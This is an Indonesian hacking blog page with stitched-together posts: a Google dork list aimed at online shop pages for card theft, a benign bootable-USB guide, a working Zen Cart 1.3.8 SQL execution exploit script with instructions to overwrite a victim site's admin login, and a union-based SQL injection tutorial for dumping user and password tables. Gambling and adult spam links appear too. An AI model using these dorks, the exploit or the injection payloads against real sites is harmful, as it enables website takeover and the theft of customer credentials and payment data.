Join Now

XXX Gold Club

Sabtu, 02 April 2011

Dork CC

cat.asp?cat=
productlist.asp?catalogid =
Category.asp?category_id=
Category.cfm?category_id=
category.asp?cid=
category.cfm?cid=
category.asp?cat=
category.cfm?cat=
category.asp?id=
index.cfm?pageid=
category.asp?catid=
Category.asp?c=
Category.cfm?c=
productlist.cfm?catalogid =
productlist.asp?catalogid =
viewitem.asp?catalogid=
viewitem.cfm?catalogid=
catalog.cfm?catalogId=
catalog.asp?catalogId=
department.cfm?dept=
department.asp?dept=
itemdetails.cfm?catalogId =
itemdetails.asp?catalogId =
product_detail.asp?catalo gid=
product_detail.cfm?catalo gid=
product_list.asp?catalogi d=
product_list.cfm?catalogi d=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
search_results.cfm?txtsea rchParamCat=
search_results.asp?txtsea rchParamCat=
itemdetails.cfm?catalogId =
itemdetails.asp?catalogId =
store-page.cfm?go=
store-page.asp?go=
Detail.cfm?CatalogID=
Detail.asp?CatalogID=
browse.cfm?category_id=
view.cfm?category_id=
products.cfm?category_id=
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id =
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?c atalogid=
shopdisplayproducts.cfn?c atalogid=
displayproducts.cfm?categ ory_id=
displayproducts.asp?categ ory_id=
DisplayProducts.asp?prodc at=
DisplayProducts.cfm?prodc at=x
productDetail.cfm?Product ID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp? CatId=
Store_ViewProducts.asp?Ca t=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productI D=
ProductDetails.asp?prdId= 12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?produc t_id=
products.php?subcat_id=
product.php?product_id=
view_product.cfm?productI D=
product_details.asp?prodi d=
shopdisplayproducts.cfm?i d=
displayproducts.cfm?id=

Link Alternatif Vivoslot

membuat bootable windows di flashdisk

Bagaimana cara membuat windows bootable flash disk? Demikianlah tugas yang akan kita kerjakan kali ini. Pada beberapa artikel sebelumnya, saya telah menulis artikel Apa Dan Mengapa Install Ulang Sistem Operasi Windows. Artikel ini ada kaitannya dengan artikel tersebut. Jika suatu waktu Anda harus menginstall ulang windows, maka selain CD installer Anda juga bisa menggunakan Flash disk sebagai bootable windows. Oleh karena itu kita harus membuatnya lebih dahulu.
Memiliki flash disk bootable sangat penting, terutama jika Anda adalah pengguna Netbook yang tidak mempunyai CD ROM internal. Menggunakan USB bootable untuk menginstal sistem operasi (OS) tidak hanya membuat instalasi lebih cepat, tetapi juga dapat menyimpan file instalasi yang sangat besar yang biasanya disimpan dalam DVD. Membuat atau menggunakan USB drive untuk menginstal sistem operasi Windows sangat mudah jika Anda mengikuti langkah-langkah yang disebutkan di bawah ini.

1. Masukkan flash disk dengan minimal space 4GB yang masih kosong karena akan dijadikan bootable flash disk.
2. Buka Command Prompt dengan cara klik [Start] dan ketik [CMD] dalam kotak search lalu tekan [Enter]. Alternativelain adalah melalui ; Start >All programs>Accessories> klik kanan pada Command Prompt dan pilih [run as administrator].
3. Ketika Command Prompt terbuka, masukkan command/perintah berikut: DISKPART lalu klik [Enter], LIST DISK lalu klik [Enter]. Setelah Anda masukkan perintah LIST DISK, ia akan menampilkan nomor disk USB drive Anda.
4. Dalam langkah ini Anda harus memasukkan semua perintah di bawah ini satu per satu lalu tekan enter.
5. SELECT DISK 1 lalu klik [Enter], (nomor 1 adalah sesuai nomor flash disk Anda seperti pada gambar diatas )
6. CLEAN lalu klik [Enter],
7. CREATE PARTITION PRIMARY lalu klik [Enter],
8. SELECT PARTITION 1 lalu klik [Enter],
9. ACTIVE lalu klik [Enter],
10. FORMAT FS=NTFS lalu klik [Enter], (mohon sabar karena proses format akan memakan waktu beberapa puluh menit baru Anda ketik perintah selanjutnya)
11. ASSIGN lalu klik [Enter],
12. EXIT lalu klik [Enter], (Jangan tutup command prompt sebelum seluruh proses selesai). bootable flash disk
13. Masukkan DVD Windows Anda dalam drive optik dan catat huruf drive dari drive optik dan media flash disk. Di sini saya gunakan “D” sebagai huruf kode drive DVD dan huruf “H” sebagai huruf drive flash disk.
14. Kembali ke command prompt dan jalankan perintah berikut; D:CD BOOT lalu tekan [Enter], dimana “D” adalah huruf kode DVD drive.
15. CD BOOT dan tekan [Enter] lalu perhatikan akan muncul suatu jendela pesan yang kira-kira seperti berikut; BOOTSECT.EXE/NT60 H: (dimana “H” adalah huruf kode flash disk drive)flash disk bootable
16. Sekarang Salin isi DVD Windows ke USB.

Dengan selesainya langkah copy pada point 17 diatas maka proses pembuatan flash disk bootable selesai. Anda sekarang dapat menggunakan flash disk ini sebagai bootable USB pada setiap komputer yang dilengkapi dengan fitur boot from USB (sebagian besar motherboard saat ini mendukung fitur ini).

Catatan; panduan ini hanya pada Windows 7 dan Vista, tidak akan bekerja pada komputer windows XP jadi caranya lain lagi. Saya sarankan baca dengan seksama petunjuk diatas sebelum anda mulai membuatnya.

Bugs Zencart

Sebenarnya sih tutorial lama..
tapi ga' ada salah nya ane share di sini..

ok langsung aja ya
buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
if(need):
print '\n#error', "-"+name, 'parameter required'
exit(1)

if (len(sys.argv) < 2): print """ =____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________= ======================================================================== | BlackH |
========================================================================
| |
| $system> python """+sys.argv[0]+""" -url
|
| Param:
ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> success (', cmd, ")"
else:
print '>> failed, be sure to end with ; (', cmd, ")"


tuh pithon save dgn extensi zen.py
sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja disini
kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu
kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <–enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name=’adminz’, admin_email=’admin@shopadmin.com’, admin_pass=’617ec22fbb8f201c366e9848c0eb6925:87′ WHERE admin_id=’1′; trus enter
kalo berhasil maka akan muncul kayak ini :
>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='8db2436805656b3d3ca13c61a6e38c0c' WHERE admin_id='1'; )sql@jah$
 
ne ss  nya :
 
  
 
kalo udah succes, tinggal di url target ditambahin /admin/
kalo succes setiap username sama pasword nya itu adminz : perbaungan
sekian dan terima kasih
Kalo berhasil ada tulisan ini
>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )sql@jah$
Kalo gagal ada tulisan gini
>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1';
Atau ini
Traceback (most recent call last): File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in if (re.findall('1 statements processed',urllib2.urlopen(req).read())): File "C:\Python25\lib\urllib2.py", line 121, in urlopen return _opener.open(url, data) File "C:\Python25\lib\urllib2.py", line 374, in open response = self._open(req, data) File "C:\Python25\lib\urllib2.py", line 392, in _open '_open', req) File "C:\Python25\lib\urllib2.py", line 353, in _call_chain result = func(*args) File "C:\Python25\lib\urllib2.py", line 1101, in http_open return self.do_open(httplib.HTTPConnection, req) File "C:\Python25\lib\urllib2.py", line 1076, in do_open raise URLError(err)urllib2.URLError: 

By : Amp3r

Tutorial SQL Injection

sepintas tekhnik ini sama dengan tekhnik SQL pada umumnya...
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

###################
## +step Satu+ ##
###################
carilah target
salah satunya menggunakan search engine pada google !!
sebagai penjelasan klik disini

misal: [site]/berita.php?id= atau /news.php?id=

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

###################
## +step dua+ ##
###################
mencari dan menghitung jumlah table yang ada dalam databasenya...
seperti yang kita ketahui bersama pada SQL injection untuk menghitung jumlah table pada databasenya
menggunakan perintah : order by
contoh :
[site]/berita.php?id=-12 order by 1--
[site]/berita.php?id=-12 order by 2--

hingga muncul pesan error...

*namun untuk kasus tertentu order by tidak dapat digunakan ...
pada blind SQL kita dapat mengetahui jumlah table yang ada dengan cara Melakukan column count !!!

contoh melakuan column count :
union select diikuti dengan angka.

maka: [site]/berita.php?id= union select 1/*
maka: [site]/berita.php?id= union select 1,2/*
maka: [site]/berita.php?id= union select 1,2,3/*

hingga keluar angka pada tampilan web target

anggap yang keluar sampai angka 9
ok angka yg keluar angka 9 dan 2

###################
## +step tiga+ ##
###################

menampilkan table...
pada SQL injection untuk menampilkan table adalah memasukkan perintah group_concat(table_name) pada angka yg keluar tadi
dan perintah +from+information_schema.tables+where+table_schema=database() setelah angka terakhir

contoh :
[site]/berita.php?id=-12+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

jika gagal kita dapat mengganti querynya
query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1
masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"
menjadi , [site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 0,1/*

disini saya menggunakan 2.

####################
## +step empat+ ##
####################

mengeluarkan table_name yang lain.
untuk mengeluarkan table_name yang lain ganti nilai limit menjadi , 1,1 , 2,1 , 3,1 ....
hingga mendapatkan table yang kita inginkan !!!

contoh:
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 1,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 2,1/*
[site]/berita.php?id=-12 union select 1,table_name,3,4,5,6,7,8,9 FROM information_schema.tables where table_schema=database() limit 3,1/*

dan contoh hasilnya :
1,1 : aktual_berita
2,1 : aktual_kategori
3,1 : berita
4,1 : category
5,1 : iklan
10,1: user

dan tabel yang kita butuhkan ada pada limit 10,1 ( user )

###################
## +step lima+ ##
###################
ada tahap ini kamu wajib mengekstrax kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://ascii-convert.tk/

kata user menjadi : 75736572
maka :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=user limit 0,1/*
menjadi
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*

untuk mengetahui isi pada table user anda dapat mengganti nilai limit :
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 0,1/*
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=0x75736572 limit 1,1/*

dan hasilnya :
0,1 : userid
1,1 : password
1,2 : description
1,3 : auth

* Setiap bilangan hexa harus di tambah 0x
contoh : bilangan hexa dari indonesiacoder = 696E646F6E65736961636F646572
bila di gunakan akan menjadi = 0x696E646F6E65736961636F646572

###################
## +step enam+ ##
###################
mengeluarkan field .
query yang kita gunakan adalah : UNION SELECT column_name FROM table_name

column_name :userid, password
table_name :user

masukan column_name pada angka yang keluar kemudian FROM table_name
menjadi,
[site]/berita.php?id=-12 union select 1,column_name,3,4,5,6,7,8,9 from table_name/*

contoh
[site]/berita.php?id=-12 union select 1,password,3,4,5,6,7,8,9 from user/*

* Mengunakan Concatenation
Concatenation adalah kondisi dimana kamu ingin mengeluarkan field dengan banyak colomn_name atau karna kurangnya angka yang keluar saat blind union. untuk string Concatenation pada mysql adalah CONCAT(A,B,C,...)

contoh:
kondisi kurangnya angka yang keluar saat blind union.
column_name : userid, password, description
table_name :user
angka yang keluar: 2 dan 9

bagaimana kita mengeluarkan field dengan 3 column_name sedangkan angka yang keluar hanya 2 (2 dan 9), jawabanya menggunakan concat() tadi.
contoh :
[site]/berita.php?id=-12 union select 1,concat(0x3C3D3E,userid,0x3a,password,0x3a,description,0x3C3D3E),3,4,5,6,7,8,9 from user/*

###################
## +step enam+ ##
###################
tahap terakhir mencari halaman admin atau login